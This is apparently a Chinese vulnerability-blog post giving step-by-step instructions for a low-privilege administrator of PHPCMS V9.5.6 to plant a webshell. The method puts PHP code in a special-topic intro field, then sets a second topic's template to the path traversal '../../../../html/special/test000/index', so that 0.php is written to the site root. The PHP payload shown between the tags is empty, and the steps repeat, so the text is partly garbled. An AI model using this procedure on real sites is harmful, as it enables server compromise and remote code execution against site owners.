PHPCMS后台低权限拿webSHELL

  • A+
所属分类:漏洞时代
摘要

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程

1. 添加专题专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
[php]

[/php]
生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交

2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为 ../../../../html/special/test000/index
其他默认 -> 提交

会在根目录下面生成 0.php 内容为

[php][/php]

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程
PHPCMS后台低权限拿webSHELL
1. 添加专题

专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
[php]

[/php]
生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
PHPCMS后台低权限拿webSHELL
2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为 ../../../../html/special/test000/index
其他默认 -> 提交
PHPCMS后台低权限拿webSHELL
PHPCMS后台低权限拿webSHELL
会在根目录下面生成 0.php 内容为
PHPCMS后台低权限拿webSHELL
[php][/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: